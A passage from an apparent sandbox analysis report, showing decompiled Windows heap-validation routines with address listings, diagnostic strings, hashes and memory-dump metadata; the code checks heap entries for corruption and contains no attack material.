                                                                            				signed int _t322;
                                                                            				signed int _t326;
                                                                            				signed int _t327;
                                                                            				void* _t328;
                                                                            				signed int _t332;
                                                                            				signed int _t340;
                                                                            				signed int _t342;
                                                                            				signed char _t344;
                                                                            				signed int* _t345;
                                                                            				void* _t346;
                                                                            				signed char _t352;
                                                                            				signed char _t367;
                                                                            				signed int _t374;
                                                                            				intOrPtr* _t378;
                                                                            				signed int _t380;
                                                                            				signed int _t385;
                                                                            				signed char _t390;
                                                                            				unsigned int _t392;
                                                                            				signed char _t395;
                                                                            				unsigned int _t397;
                                                                            				intOrPtr* _t400;
                                                                            				signed int _t402;
                                                                            				signed int _t405;
                                                                            				intOrPtr* _t406;
                                                                            				signed int _t407;
                                                                            				intOrPtr _t412;
                                                                            				void* _t414;
                                                                            				signed int _t415;
                                                                            				signed int _t416;
                                                                            				signed int _t429;
                                                                            
                                                                            				_v16 = _v16 & 0x00000000;
                                                                            				_t189 = 0;
                                                                            				_v8 = _v8 & 0;
                                                                            				_t332 = __edx;
                                                                            				_v12 = 0;
                                                                            				_t414 = __ecx;
                                                                            				_t415 = __edx;
                                                                            				if(__edx >=  *((intOrPtr*)(__edx + 0x28))) {
                                                                            					L88:
                                                                            					_t416 = _v16;
                                                                            					if( *((intOrPtr*)(_t332 + 0x2c)) == _t416) {
                                                                            						__eflags =  *((intOrPtr*)(_t332 + 0x30)) - _t189;
                                                                            						if( *((intOrPtr*)(_t332 + 0x30)) == _t189) {
                                                                            							L107:
                                                                            							return 1;
                                                                            						}
                                                                            						_t191 =  *[fs:0x30];
                                                                            						__eflags =  *(_t191 + 0xc);
                                                                            						if( *(_t191 + 0xc) == 0) {
                                                                            							_push("HEAP: ");
                                                                            							E0107B150();
                                                                            						} else {
                                                                            							E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                            						}
                                                                            						_push(_v12);
                                                                            						_push( *((intOrPtr*)(_t332 + 0x30)));
                                                                            						_push(_t332);
                                                                            						_push("Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)\n");
                                                                            						L122:
                                                                            						E0107B150();
                                                                            						L119:
                                                                            						return 0;
                                                                            					}
                                                                            					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                            						_push("HEAP: ");
                                                                            						E0107B150();
                                                                            					} else {
                                                                            						E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                            					}
                                                                            					_push(_t416);
                                                                            					_push( *((intOrPtr*)(_t332 + 0x2c)));
                                                                            					_push(_t332);
                                                                            					_push("Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)\n");
                                                                            					goto L122;
                                                                            				} else {
                                                                            					goto L1;
                                                                            				}
                                                                            				do {
                                                                            					L1:
                                                                            					 *_a16 = _t415;
                                                                            					if( *(_t414 + 0x4c) != 0) {
                                                                            						_t392 =  *(_t414 + 0x50) ^  *_t415;
                                                                            						 *_t415 = _t392;
                                                                            						_t352 = _t392 >> 0x00000010 ^ _t392 >> 0x00000008 ^ _t392;
                                                                            						_t424 = _t392 >> 0x18 - _t352;
                                                                            						if(_t392 >> 0x18 != _t352) {
                                                                            							_push(_t352);
                                                                            							E0112FA2B(_t332, _t414, _t415, _t414, _t415, _t424);
                                                                            						}
                                                                            					}
                                                                            					if(_v8 != ( *(_t415 + 4) ^  *(_t414 + 0x54))) {
                                                                            						_t210 =  *[fs:0x30];
                                                                            						__eflags =  *(_t210 + 0xc);
                                                                            						if( *(_t210 + 0xc) == 0) {
                                                                            							_push("HEAP: ");
                                                                            							E0107B150();
                                                                            						} else {
                                                                            							E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                            						}
                                                                            						_push(_v8 & 0x0000ffff);
                                                                            						_t340 =  *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff;
                                                                            						__eflags = _t340;
                                                                            						_push(_t340);
                                                                            						E0107B150("Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)\n", _t415);
                                                                            						L117:
                                                                            						__eflags =  *(_t414 + 0x4c);
                                                                            						if( *(_t414 + 0x4c) != 0) {
                                                                            							 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
                                                                            							 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                                                            							__eflags =  *_t415;
                                                                            						}
                                                                            						goto L119;
                                                                            					}
                                                                            					_t225 =  *_t415 & 0x0000ffff;
                                                                            					_t390 =  *(_t415 + 2);
                                                                            					_t342 = _t225;
                                                                            					_v8 = _t342;
                                                                            					_v20 = _t342;
                                                                            					_v28 = _t225 << 3;
                                                                            					if((_t390 & 0x00000001) == 0) {
                                                                            						__eflags =  *(_t414 + 0x40) & 0x00000040;
                                                                            						_t344 = (_t342 & 0xffffff00 | ( *(_t414 + 0x40) & 0x00000040) != 0x00000000) & _t390 >> 0x00000002;
                                                                            						__eflags = _t344 & 0x00000001;
                                                                            						if((_t344 & 0x00000001) == 0) {
                                                                            							L66:
                                                                            							_t345 = _a12;
                                                                            							 *_a8 =  *_a8 + 1;
                                                                            							 *_t345 =  *_t345 + ( *_t415 & 0x0000ffff);
                                                                            							__eflags =  *_t345;
                                                                            							L67:
                                                                            							_t231 =  *(_t415 + 6);
                                                                            							if(_t231 == 0) {
                                                                            								_t346 = _t414;
                                                                            							} else {
                                                                            								_t346 = (_t415 & 0xffff0000) - ((_t231 & 0x000000ff) << 0x10) + 0x10000;
                                                                            							}
                                                                            							if(_t346 != _t332) {
                                                                            								_t232 =  *[fs:0x30];
                                                                            								__eflags =  *(_t232 + 0xc);
                                                                            								if( *(_t232 + 0xc) == 0) {
                                                                            									_push("HEAP: ");
                                                                            									E0107B150();
                                                                            								} else {
                                                                            									E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                            								}
                                                                            								_push( *(_t415 + 6) & 0x000000ff);
                                                                            								_push(_t415);
                                                                            								_push("Heap block at %p has incorrect segment offset (%x)\n");
                                                                            								goto L95;
                                                                            							} else {
                                                                            								if( *((char*)(_t415 + 7)) != 3) {
                                                                            									__eflags =  *(_t414 + 0x4c);
                                                                            									if( *(_t414 + 0x4c) != 0) {
                                                                            										 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
                                                                            										 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                                                            										__eflags =  *_t415;
                                                                            									}
                                                                            									_t415 = _t415 + _v28;
                                                                            									__eflags = _t415;
                                                                            									goto L86;
                                                                            								}
                                                                            								_t245 =  *(_t415 + 0x1c);
                                                                            								if(_t245 == 0) {
                                                                            									_t395 =  *_t415 & 0x0000ffff;
                                                                            									_v6 = _t395 >> 8;
                                                                            									__eflags = _t415 + _t395 * 8 -  *((intOrPtr*)(_t332 + 0x28));
                                                                            									if(_t415 + _t395 * 8 ==  *((intOrPtr*)(_t332 + 0x28))) {
                                                                            										__eflags =  *(_t414 + 0x4c);
                                                                            										if( *(_t414 + 0x4c) != 0) {
                                                                            											 *(_t415 + 3) =  *(_t415 + 2) ^ _v6 ^ _t395;
                                                                            											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                                                            											__eflags =  *_t415;
                                                                            										}
                                                                            										goto L107;
                                                                            									}
                                                                            									_t249 =  *[fs:0x30];
                                                                            									__eflags =  *(_t249 + 0xc);
                                                                            									if( *(_t249 + 0xc) == 0) {
                                                                            										_push("HEAP: ");
                                                                            										E0107B150();
                                                                            									} else {
                                                                            										E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                            									}
                                                                            									_push( *((intOrPtr*)(_t332 + 0x28)));
                                                                            									_push(_t415);
                                                                            									_push("Heap block at %p is not last block in segment (%p)\n");
                                                                            									L95:
                                                                            									E0107B150();
                                                                            									goto L117;
                                                                            								}
                                                                            								_v12 = _v12 + 1;
                                                                            								_v16 = _v16 + (_t245 >> 0xc);
                                                                            								if( *(_t414 + 0x4c) != 0) {
                                                                            									 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
                                                                            									 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                                                            								}
                                                                            								_t415 = _t415 + 0x20 +  *(_t415 + 0x1c);
                                                                            								if(_t415 ==  *((intOrPtr*)(_t332 + 0x28))) {
                                                                            									L82:
                                                                            									_v8 = _v8 & 0x00000000;
                                                                            									goto L86;
                                                                            								} else {
                                                                            									if( *(_t414 + 0x4c) != 0) {
                                                                            										_t397 =  *(_t414 + 0x50) ^  *_t415;
                                                                            										 *_t415 = _t397;
                                                                            										_t367 = _t397 >> 0x00000010 ^ _t397 >> 0x00000008 ^ _t397;
                                                                            										_t442 = _t397 >> 0x18 - _t367;
                                                                            										if(_t397 >> 0x18 != _t367) {
                                                                            											_push(_t367);
                                                                            											E0112FA2B(_t332, _t414, _t415, _t414, _t415, _t442);
                                                                            										}
                                                                            									}
                                                                            									if( *(_t414 + 0x54) !=  *(_t415 + 4)) {
                                                                            										_t259 =  *[fs:0x30];
                                                                            										__eflags =  *(_t259 + 0xc);
                                                                            										if( *(_t259 + 0xc) == 0) {
                                                                            											_push("HEAP: ");
                                                                            											E0107B150();
                                                                            										} else {
                                                                            											E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                            										}
                                                                            										_push( *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff);
                                                                            										_push(_t415);
                                                                            										_push("Heap block at %p has corrupted PreviousSize (%lx)\n");
                                                                            										goto L95;
                                                                            									} else {
                                                                            										if( *(_t414 + 0x4c) != 0) {
                                                                            											 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
                                                                            											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                                                            										}
                                                                            										goto L82;
                                                                            									}
                                                                            								}
                                                                            							}
                                                                            						}
                                                                            						_t281 = _v28 + 0xfffffff0;
                                                                            						_v24 = _t281;
                                                                            						__eflags = _t390 & 0x00000002;
                                                                            						if((_t390 & 0x00000002) != 0) {
                                                                            							__eflags = _t281 - 4;
                                                                            							if(_t281 > 4) {
                                                                            								_t281 = _t281 - 4;
                                                                            								__eflags = _t281;
                                                                            								_v24 = _t281;
                                                                            							}
                                                                            						}
                                                                            						__eflags = _t390 & 0x00000008;
                                                                            						if((_t390 & 0x00000008) == 0) {
                                                                            							_t102 = _t415 + 0x10; // -8
                                                                            							_t283 = E010CD540(_t102, _t281, 0xfeeefeee);
                                                                            							_v20 = _t283;
                                                                            							__eflags = _t283 - _v24;
                                                                            							if(_t283 != _v24) {
                                                                            								_t284 =  *[fs:0x30];
                                                                            								__eflags =  *(_t284 + 0xc);
                                                                            								if( *(_t284 + 0xc) == 0) {
                                                                            									_push("HEAP: ");
                                                                            									E0107B150();
                                                                            								} else {
                                                                            									E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                            								}
                                                                            								_t288 = _v20 + 8 + _t415;
                                                                            								__eflags = _t288;
                                                                            								_push(_t288);
                                                                            								_push(_t415);
                                                                            								_push("Free Heap block %p modified at %p after it was freed\n");
                                                                            								goto L95;
                                                                            							}
                                                                            							goto L66;
                                                                            						} else {
                                                                            							_t374 =  *(_t415 + 8);
                                                                            							_t400 =  *((intOrPtr*)(_t415 + 0xc));
                                                                            							_v24 = _t374;
                                                                            							_v28 = _t400;
                                                                            							_t294 =  *(_t374 + 4);
                                                                            							__eflags =  *_t400 - _t294;
                                                                            							if( *_t400 != _t294) {
                                                                            								L64:
                                                                            								_push(_t374);
                                                                            								_push( *_t400);
                                                                            								_t101 = _t415 + 8; // -16
                                                                            								E0113A80D(_t414, 0xd, _t101, _t294);
                                                                            								goto L86;
                                                                            							}
                                                                            							_t56 = _t415 + 8; // -16
                                                                            							__eflags =  *_t400 - _t56;
                                                                            							_t374 = _v24;
                                                                            							if( *_t400 != _t56) {
                                                                            								goto L64;
                                                                            							}
                                                                            							 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) - _v20;
                                                                            							_t402 =  *(_t414 + 0xb4);
                                                                            							__eflags = _t402;
                                                                            							if(_t402 == 0) {
                                                                            								L35:
                                                                            								_t298 = _v28;
                                                                            								 *_t298 = _t374;
                                                                            								 *(_t374 + 4) = _t298;
                                                                            								__eflags =  *(_t415 + 2) & 0x00000008;
                                                                            								if(( *(_t415 + 2) & 0x00000008) == 0) {
                                                                            									L39:
                                                                            									_t377 =  *_t415 & 0x0000ffff;
                                                                            									_t299 = _t414 + 0xc0;
                                                                            									_v28 =  *_t415 & 0x0000ffff;
                                                                            									 *(_t415 + 2) = 0;
                                                                            									 *((char*)(_t415 + 7)) = 0;
                                                                            									__eflags =  *(_t414 + 0xb4);
                                                                            									if( *(_t414 + 0xb4) == 0) {
                                                                            										_t378 =  *_t299;
                                                                            									} else {
                                                                            										_t378 = E0109E12C(_t414, _t377);
                                                                            										_t299 = _t414 + 0xc0;
                                                                            									}
                                                                            									__eflags = _t299 - _t378;
                                                                            									if(_t299 == _t378) {
                                                                            										L51:
                                                                            										_t300 =  *((intOrPtr*)(_t378 + 4));
                                                                            										__eflags =  *_t300 - _t378;
                                                                            										if( *_t300 != _t378) {
                                                                            											_push(_t378);
                                                                            											_push( *_t300);
                                                                            											__eflags = 0;
                                                                            											E0113A80D(0, 0xd, _t378, 0);
                                                                            										} else {
                                                                            											_t87 = _t415 + 8; // -16
                                                                            											_t406 = _t87;
                                                                            											 *_t406 = _t378;
                                                                            											 *((intOrPtr*)(_t406 + 4)) = _t300;
                                                                            											 *_t300 = _t406;
                                                                            											 *((intOrPtr*)(_t378 + 4)) = _t406;
                                                                            										}
                                                                            										 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) + ( *_t415 & 0x0000ffff);
                                                                            										_t405 =  *(_t414 + 0xb4);
                                                                            										__eflags = _t405;
                                                                            										if(_t405 == 0) {
                                                                            											L61:
                                                                            											__eflags =  *(_t414 + 0x4c);
                                                                            											if(__eflags != 0) {
                                                                            												 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
                                                                            												 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                                                            											}
                                                                            											goto L86;
                                                                            										} else {
                                                                            											_t380 =  *_t415 & 0x0000ffff;
                                                                            											while(1) {
                                                                            												__eflags = _t380 -  *((intOrPtr*)(_t405 + 4));
                                                                            												if(_t380 <  *((intOrPtr*)(_t405 + 4))) {
                                                                            													break;
                                                                            												}
                                                                            												_t307 =  *_t405;
                                                                            												__eflags = _t307;
                                                                            												if(_t307 == 0) {
                                                                            													_t309 =  *((intOrPtr*)(_t405 + 4)) - 1;
                                                                            													L60:
                                                                            													_t94 = _t415 + 8; // -16
                                                                            													E0109E4A0(_t414, _t405, 1, _t94, _t309, _t380);
                                                                            													goto L61;
                                                                            												}
                                                                            												_t405 = _t307;
                                                                            											}
                                                                            											_t309 = _t380;
                                                                            											goto L60;
                                                                            										}
                                                                            									} else {
                                                                            										_t407 =  *(_t414 + 0x4c);
                                                                            										while(1) {
                                                                            											__eflags = _t407;
                                                                            											if(_t407 == 0) {
                                                                            												_t312 =  *(_t378 - 8) & 0x0000ffff;
                                                                            											} else {
                                                                            												_t315 =  *(_t378 - 8);
                                                                            												_t407 =  *(_t414 + 0x4c);
                                                                            												__eflags = _t315 & _t407;
                                                                            												if((_t315 & _t407) != 0) {
                                                                            													_t315 = _t315 ^  *(_t414 + 0x50);
                                                                            													__eflags = _t315;
                                                                            												}
                                                                            												_t312 = _t315 & 0x0000ffff;
                                                                            											}
                                                                            											__eflags = _v28 - (_t312 & 0x0000ffff);
                                                                            											if(_v28 <= (_t312 & 0x0000ffff)) {
                                                                            												goto L51;
                                                                            											}
                                                                            											_t378 =  *_t378;
                                                                            											__eflags = _t414 + 0xc0 - _t378;
                                                                            											if(_t414 + 0xc0 != _t378) {
                                                                            												continue;
                                                                            											}
                                                                            											goto L51;
                                                                            										}
                                                                            										goto L51;
                                                                            									}
                                                                            								}
                                                                            								_t317 = E0109A229(_t414, _t415);
                                                                            								__eflags = _t317;
                                                                            								if(_t317 != 0) {
                                                                            									goto L39;
                                                                            								}
                                                                            								E0109A309(_t414, _t415,  *_t415 & 0x0000ffff, 1);
                                                                            								goto L86;
                                                                            							}
                                                                            							_t385 =  *_t415 & 0x0000ffff;
                                                                            							while(1) {
                                                                            								__eflags = _t385 -  *((intOrPtr*)(_t402 + 4));
                                                                            								if(_t385 <  *((intOrPtr*)(_t402 + 4))) {
                                                                            									break;
                                                                            								}
                                                                            								_t320 =  *_t402;
                                                                            								__eflags = _t320;
                                                                            								if(_t320 == 0) {
                                                                            									_t322 =  *((intOrPtr*)(_t402 + 4)) - 1;
                                                                            									L34:
                                                                            									_t63 = _t415 + 8; // -16
                                                                            									E0109BC04(_t414, _t402, 1, _t63, _t322, _t385);
                                                                            									_t374 = _v24;
                                                                            									goto L35;
                                                                            								}
                                                                            								_t402 = _t320;
                                                                            							}
                                                                            							_t322 = _t385;
                                                                            							goto L34;
                                                                            						}
                                                                            					}
                                                                            					if(_a20 == 0) {
                                                                            						L18:
                                                                            						if(( *(_t415 + 2) & 0x00000004) == 0) {
                                                                            							goto L67;
                                                                            						}
                                                                            						if(E011223E3(_t414, _t415) == 0) {
                                                                            							goto L117;
                                                                            						}
                                                                            						goto L67;
                                                                            					} else {
                                                                            						if((_t390 & 0x00000002) == 0) {
                                                                            							_t326 =  *(_t415 + 3) & 0x000000ff;
                                                                            						} else {
                                                                            							_t328 = E01071F5B(_t415);
                                                                            							_t342 = _v20;
                                                                            							_t326 =  *(_t328 + 2) & 0x0000ffff;
                                                                            						}
                                                                            						_t429 = _t326;
                                                                            						if(_t429 == 0) {
                                                                            							goto L18;
                                                                            						}
                                                                            						if(_t429 >= 0) {
                                                                            							__eflags = _t326 & 0x00000800;
                                                                            							if(__eflags != 0) {
                                                                            								goto L18;
                                                                            							}
                                                                            							__eflags = _t326 -  *((intOrPtr*)(_t414 + 0x84));
                                                                            							if(__eflags >= 0) {
                                                                            								goto L18;
                                                                            							}
                                                                            							_t412 = _a20;
                                                                            							_t327 = _t326 & 0x0000ffff;
                                                                            							L17:
                                                                            							 *((intOrPtr*)(_t412 + _t327 * 4)) =  *((intOrPtr*)(_t412 + _t327 * 4)) + _t342;
                                                                            							goto L18;
                                                                            						}
                                                                            						_t327 = _t326 & 0x00007fff;
                                                                            						if(_t327 >= 0x81) {
                                                                            							goto L18;
                                                                            						}
                                                                            						_t412 = _a24;
                                                                            						goto L17;
                                                                            					}
                                                                            					L86:
                                                                            				} while (_t415 <  *((intOrPtr*)(_t332 + 0x28)));
                                                                            				_t189 = _v12;
                                                                            				goto L88;
                                                                            			}
                                                                            0x01134ff4
                                                                            0x00000000
                                                                            0x01134fe4
                                                                            0x01134f9e
                                                                            0x01134fa4
                                                                            0x01134fa8
                                                                            0x01134fc7
                                                                            0x01134fcc
                                                                            0x01134faa
                                                                            0x01134fbf
                                                                            0x01134fc4
                                                                            0x01134fd2
                                                                            0x01134fd5
                                                                            0x01134fd6
                                                                            0x01134f34
                                                                            0x01134f34
                                                                            0x00000000
                                                                            0x01134f39
                                                                            0x01134e0e
                                                                            0x01134e14
                                                                            0x01134e1b
                                                                            0x01134e25
                                                                            0x01134e2b
                                                                            0x01134e2b
                                                                            0x01134e33
                                                                            0x01134e38
                                                                            0x01134e8a
                                                                            0x01134e8a
                                                                            0x00000000
                                                                            0x01134e3a
                                                                            0x01134e3e
                                                                            0x01134e43
                                                                            0x01134e47
                                                                            0x01134e53
                                                                            0x01134e58
                                                                            0x01134e5a
                                                                            0x01134e5c
                                                                            0x01134e61
                                                                            0x01134e61
                                                                            0x01134e5a
                                                                            0x01134e6e
                                                                            0x01134f41
                                                                            0x01134f47
                                                                            0x01134f4b
                                                                            0x01134f6a
                                                                            0x01134f6f
                                                                            0x01134f4d
                                                                            0x01134f62
                                                                            0x01134f67
                                                                            0x01134f7f
                                                                            0x01134f80
                                                                            0x01134f81
                                                                            0x00000000
                                                                            0x01134e74
                                                                            0x01134e78
                                                                            0x01134e82
                                                                            0x01134e88
                                                                            0x01134e88
                                                                            0x00000000
                                                                            0x01134e78
                                                                            0x01134e6e
                                                                            0x01134e38
                                                                            0x01134df3
                                                                            0x01134bfe
                                                                            0x01134c01
                                                                            0x01134c04
                                                                            0x01134c07
                                                                            0x01134c09
                                                                            0x01134c0c
                                                                            0x01134c0e
                                                                            0x01134c0e
                                                                            0x01134c11
                                                                            0x01134c11
                                                                            0x01134c0c
                                                                            0x01134c14
                                                                            0x01134c17
                                                                            0x01134dae
                                                                            0x01134db2
                                                                            0x01134db7
                                                                            0x01134dba
                                                                            0x01134dbd
                                                                            0x01134ef1
                                                                            0x01134ef7
                                                                            0x01134efb
                                                                            0x01134f1a
                                                                            0x01134f1f
                                                                            0x01134efd
                                                                            0x01134f12
                                                                            0x01134f17
                                                                            0x01134f2b
                                                                            0x01134f2b
                                                                            0x01134f2d
                                                                            0x01134f2e
                                                                            0x01134f2f
                                                                            0x00000000
                                                                            0x01134f2f
                                                                            0x00000000
                                                                            0x01134c1d
                                                                            0x01134c1d
                                                                            0x01134c20
                                                                            0x01134c23
                                                                            0x01134c26
                                                                            0x01134c29
                                                                            0x01134c2c
                                                                            0x01134c2e
                                                                            0x01134d91
                                                                            0x01134d91
                                                                            0x01134d92
                                                                            0x01134d97
                                                                            0x01134d9e
                                                                            0x00000000
                                                                            0x01134d9e
                                                                            0x01134c34
                                                                            0x01134c37
                                                                            0x01134c39
                                                                            0x01134c3c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x01134c45
                                                                            0x01134c48
                                                                            0x01134c4e
                                                                            0x01134c50
                                                                            0x01134c78
                                                                            0x01134c78
                                                                            0x01134c7b
                                                                            0x01134c7d
                                                                            0x01134c80
                                                                            0x01134c84
                                                                            0x01134cad
                                                                            0x01134cad
                                                                            0x01134cb0
                                                                            0x01134cb8
                                                                            0x01134cbb
                                                                            0x01134cbe
                                                                            0x01134cc1
                                                                            0x01134cc7
                                                                            0x01134cdc
                                                                            0x01134cc9
                                                                            0x01134cd2
                                                                            0x01134cd4
                                                                            0x01134cd4
                                                                            0x01134cde
                                                                            0x01134ce0
                                                                            0x01134d13
                                                                            0x01134d13
                                                                            0x01134d16
                                                                            0x01134d18
                                                                            0x01134d29
                                                                            0x01134d2a
                                                                            0x01134d2c
                                                                            0x01134d34
                                                                            0x01134d1a
                                                                            0x01134d1a
                                                                            0x01134d1a
                                                                            0x01134d1d
                                                                            0x01134d1f
                                                                            0x01134d22
                                                                            0x01134d24
                                                                            0x01134d24
                                                                            0x01134d3c
                                                                            0x01134d3f
                                                                            0x01134d45
                                                                            0x01134d47
                                                                            0x01134d6c
                                                                            0x01134d6c
                                                                            0x01134d70
                                                                            0x01134d7e
                                                                            0x01134d84
                                                                            0x01134d84
                                                                            0x00000000
                                                                            0x01134d49
                                                                            0x01134d49
                                                                            0x01134d56
                                                                            0x01134d56
                                                                            0x01134d59
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x01134d4e
                                                                            0x01134d50
                                                                            0x01134d52
                                                                            0x01134d8e
                                                                            0x01134d5d
                                                                            0x01134d5f
                                                                            0x01134d67
                                                                            0x00000000
                                                                            0x01134d67
                                                                            0x01134d54
                                                                            0x01134d54
                                                                            0x01134d5b
                                                                            0x00000000
                                                                            0x01134d5b
                                                                            0x01134ce2
                                                                            0x01134ce2
                                                                            0x01134ce5
                                                                            0x01134ce5
                                                                            0x01134ce7
                                                                            0x01134cfb
                                                                            0x01134ce9
                                                                            0x01134ce9
                                                                            0x01134cec
                                                                            0x01134cef
                                                                            0x01134cf1
                                                                            0x01134cf3
                                                                            0x01134cf3
                                                                            0x01134cf3
                                                                            0x01134cf6
                                                                            0x01134cf6
                                                                            0x01134d02
                                                                            0x01134d05
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x01134d07
                                                                            0x01134d0f
                                                                            0x01134d11
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x01134d11
                                                                            0x00000000
                                                                            0x01134ce5
                                                                            0x01134ce0
                                                                            0x01134c8a
                                                                            0x01134c8f
                                                                            0x01134c91
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x01134c9d
                                                                            0x00000000
                                                                            0x01134c9d
                                                                            0x01134c52
                                                                            0x01134c5f
                                                                            0x01134c5f
                                                                            0x01134c62
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x01134c57
                                                                            0x01134c59
                                                                            0x01134c5b
                                                                            0x01134caa
                                                                            0x01134c66
                                                                            0x01134c68
                                                                            0x01134c70
                                                                            0x01134c75
                                                                            0x00000000
                                                                            0x01134c75
                                                                            0x01134c5d
                                                                            0x01134c5d
                                                                            0x01134c64
                                                                            0x00000000
                                                                            0x01134c64
                                                                            0x01134c17
                                                                            0x01134b75
                                                                            0x01134bc4
                                                                            0x01134bc8
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x01134bd9
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x01134b77
                                                                            0x01134b7a
                                                                            0x01134b8c
                                                                            0x01134b7c
                                                                            0x01134b7e
                                                                            0x01134b83
                                                                            0x01134b86
                                                                            0x01134b86
                                                                            0x01134b90
                                                                            0x01134b93
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x01134b95
                                                                            0x01134bab
                                                                            0x01134bb0
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x01134bb2
                                                                            0x01134bb9
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x01134bbb
                                                                            0x01134bbe
                                                                            0x01134bc1
                                                                            0x01134bc1
                                                                            0x00000000
                                                                            0x01134bc1
                                                                            0x01134b97
                                                                            0x01134ba4
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x01134ba6
                                                                            0x00000000
                                                                            0x01134ba6
                                                                            0x01134ea9
                                                                            0x01134ea9
                                                                            0x01134eb2
                                                                            0x00000000

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                            • API String ID: 0-3591852110
                                                                            • Opcode ID: 3838a9141e7ad55a053035975ede10b103acf7c1b0dd1353f5a2687e576ac016
                                                                            • Instruction ID: e269d1bea590db25671e69a822438f557c5bcb67a231f22c6dfdc1aeeec821e8
                                                                            • Opcode Fuzzy Hash: 3838a9141e7ad55a053035975ede10b103acf7c1b0dd1353f5a2687e576ac016
                                                                            • Instruction Fuzzy Hash: 6A12E230600642DFEB2DCF29C494BBABBF5FF88714F198459E4868BA45D735E880CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 56%
                                                                            			E01134496(signed int* __ecx, void* __edx) {
                                                                            				signed int _v5;
                                                                            				signed int _v12;
                                                                            				signed int _v16;
                                                                            				signed int _v20;
                                                                            				signed char _v24;
                                                                            				signed int* _v28;
                                                                            				char _v32;
                                                                            				signed int* _v36;
                                                                            				void* __ebx;
                                                                            				void* __edi;
                                                                            				void* __esi;
                                                                            				void* __ebp;
                                                                            				void* _t150;
                                                                            				intOrPtr _t151;
                                                                            				signed char _t156;
                                                                            				intOrPtr _t157;
                                                                            				unsigned int _t169;
                                                                            				intOrPtr _t170;
                                                                            				signed int* _t183;
                                                                            				signed char _t184;
                                                                            				intOrPtr _t191;
                                                                            				signed int _t201;
                                                                            				intOrPtr _t203;
                                                                            				intOrPtr _t212;
                                                                            				intOrPtr _t220;
                                                                            				signed int _t230;
                                                                            				signed int _t241;
                                                                            				signed int _t244;
                                                                            				void* _t259;
                                                                            				signed int _t260;
                                                                            				signed int* _t261;
                                                                            				intOrPtr* _t262;
                                                                            				signed int _t263;
                                                                            				signed int* _t264;
                                                                            				signed int _t267;
                                                                            				signed int* _t268;
                                                                            				void* _t270;
                                                                            				void* _t281;
                                                                            				signed short _t285;
                                                                            				signed short _t289;
                                                                            				signed int _t291;
                                                                            				signed int _t298;
                                                                            				signed char _t303;
                                                                            				signed char _t308;
                                                                            				signed int _t314;
                                                                            				intOrPtr _t317;
                                                                            				unsigned int _t319;
                                                                            				signed int* _t325;
                                                                            				signed int _t326;
                                                                            				signed int _t327;
                                                                            				intOrPtr _t328;
                                                                            				signed int _t329;
                                                                            				signed int _t330;
                                                                            				signed int* _t331;
                                                                            				signed int _t332;
                                                                            				signed int _t350;
                                                                            
                                                                            				_t259 = __edx;
                                                                            				_t331 = __ecx;
                                                                            				_v28 = __ecx;
                                                                            				_v20 = 0;
                                                                            				_v12 = 0;
                                                                            				_t150 = E011349A4(__ecx);
